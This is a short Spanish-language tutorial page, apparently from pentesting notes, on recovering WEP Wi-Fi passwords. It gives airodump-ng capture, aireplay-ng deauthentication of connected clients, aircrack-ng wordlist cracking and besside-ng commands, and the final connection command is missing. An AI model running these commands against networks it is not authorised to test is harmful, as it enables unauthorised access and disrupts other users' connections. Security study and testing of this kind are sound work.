WEP
Al usar RC4 con claves de 64bits o 128bits para cifrar las comunicaciones, es declarado vulnerable y obsoleto desde 2003, que fue sustituido por WPA, por lo que es altamente recomendable no usar estas redes.
Obtener contraseƱa de la red
En primer lugar tenemos que identificar el BSSID del punto de acceso, de forma que interceptamos el trƔfico de este punto de acceso.
Hay varias formas de obtener la contraseƱa de la red:
Con clientes conectados
airodump-ng -band abg -b [BSSID] -c [canal] -w escaneo [wlan0mon]Para generar mƔs trƔfico, podemos desautenticar a los clientes conectados
aireplay-ng -0 0 -a [BSSID] [wlan0mon]Una vez hemos capturado trƔfico durante un tiempo relevante,
aircrack-ng escaneo-01.cap -w [rutaDiccionario]Con besside-ng
airmon-ng check kill
besside-ng -c [canal] -b [BSSID] [wlan1] -vConexión a la red
Teniendo la contraseña de la red podemos conectarnos generando el fichero de configuración de la red "wpa_supplicant_ESSID.conf"
Para conectarnos a la red usaremos
Recursos y enlaces de referencia
Last updated